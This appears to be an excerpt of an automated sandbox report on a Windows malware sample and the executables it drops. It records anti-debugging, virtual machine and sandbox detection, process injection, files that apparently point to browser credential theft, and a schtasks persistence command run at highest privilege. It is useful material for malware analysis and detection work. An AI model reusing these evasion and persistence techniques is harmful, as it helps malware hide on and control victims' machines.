Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: FD9F23 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 105CE6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Special instruction interceptor: First address: 8FFB82 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Special instruction interceptor: First address: 8FFC50 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Special instruction interceptor: First address: AC7751 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Special instruction interceptor: First address: AA5F2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Special instruction interceptor: First address: A9E9BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Special instruction interceptor: First address: C41419 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Special instruction interceptor: First address: C46D34 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Special instruction interceptor: First address: CC0427 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B7E9BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: D21419 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: D26D34 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: DA0427 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Memory allocated: D30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Memory allocated: 2990000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Memory allocated: D90000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Memory allocated: 1510000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Memory allocated: 2EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Memory allocated: 4FF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Memory allocated: 3140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Memory allocated: 33B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Memory allocated: 31C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Memory allocated: 1BF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Memory allocated: 36A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Memory allocated: 56A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Memory allocated: 36B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Memory allocated: 36B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Memory allocated: 56B0000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Window / User API: threadDelayed 5835
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Window / User API: threadDelayed 3971

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Dropped PE file which has not been started: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\Ride.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1081819001\kzTq7Bt.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\kzTq7Bt[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1081729001\spoDnGT.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\spoDnGT[1].exe	Jump to dropped file

Source: C:\Users\user\Desktop\random.exe TID: 6276	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7164	Thread sleep time: -54027s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5448	Thread sleep time: -46023s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7844	Thread sleep time: -42021s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7156	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8008	Thread sleep count: 188 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8008	Thread sleep time: -5640000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4088	Thread sleep time: -32016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8008	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe TID: 5444	Thread sleep time: -90000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe TID: 7580	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe TID: 2568	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe TID: 3408	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\random.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Code function: 1_2_6C4BEBF0 PR_GetNumberOfProcessors,GetSystemInfo,

1_2_6C4BEBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: K1T78D2510W1E77KV3WDUQ9M.exe, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2149221890.0000000000A7E000.00000040.00000001.01000000.00000006.sdmp, VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe, 00000003.00000002.1942834590.0000000000C22000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.1995778849.0000000000D02000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2007773289.0000000000D02000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000B.00000002.2931841029.0000000000D02000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: skotes.exe, 0000000B.00000002.2935102839.0000000001368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWQ+
Source: random.exe, 00000000.00000003.1699101050.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1769992828.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1710265090.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1804898916.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1757292743.0000000000B56000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1697712342.0000000000B59000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1844522626.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.2935102839.0000000001327000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000B.00000002.2935102839.0000000001368000.00000004.00000020.00020000.00000000.sdmp, GWZ8arC.exe, 00000017.00000002.2764435120.0000000000E20000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.000000000115E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe, 00000003.00000003.1903426388.0000000001150000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~
Source: TiVoServer.exe, 0000002D.00000002.2856869040.000000000940C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2150281200.00000000011A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWho
Source: K1T78D2510W1E77KV3WDUQ9M.exe, 00000001.00000002.2149221890.0000000000A7E000.00000040.00000001.01000000.00000006.sdmp, VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe, 00000003.00000002.1942834590.0000000000C22000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.1995778849.0000000000D02000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2007773289.0000000000D02000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 0000000B.00000002.2931841029.0000000000D02000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: services.exe, 00000026.00000002.2968675929.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, 0LGvvQO.exe, 00000030.00000002.2879928333.00000000090C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\random.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\random.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\random.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Code function: 1_2_6C58AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_6C58AC62

Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Code function: 1_2_6C58AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_6C58AC62

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: K1T78D2510W1E77KV3WDUQ9M.exe PID: 3428, type: MEMORYSTR

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	NtQuerySystemInformation: Direct from: 0x76EF63E1
Source: C:\Windows\Temp\{9A077EE8-1A9B-4DC1-B9FE-7AE305D79B85}\.ba\TiVoServer.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Memory written: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Memory written: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\services.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe "C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe "C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe "C:\Users\user\AppData\Local\Temp\1081341001\0LGvvQO.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1080446001\KQlljCB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"
Source: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe	Process created: C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe "C:\Users\user\AppData\Local\Temp\1080451001\GWZ8arC.exe"
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe "C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe"
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\1080541001\28qbTrm.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\services.exe "C:\Users\user\AppData\Roaming\SubDir\services.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\services.exe "C:\Users\user\AppData\Roaming\SubDir\services.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\services.exe "C:\Users\user\AppData\Roaming\SubDir\services.exe"
Source: C:\Users\user\AppData\Roaming\SubDir\services.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\services.exe" /rl HIGHEST /f
Source: C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe	Process created: C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe "C:\Windows\Temp\{EE2C4EBE-414D-442A-B20B-8CA425EAA610}\.cr\w3Xwk4R.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\1080595001\w3Xwk4R.exe" -burn.filehandle.attached=528 -burn.filehandle.self=648

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

Code function: 1_2_6C5D4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

1_2_6C5D4760

Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe

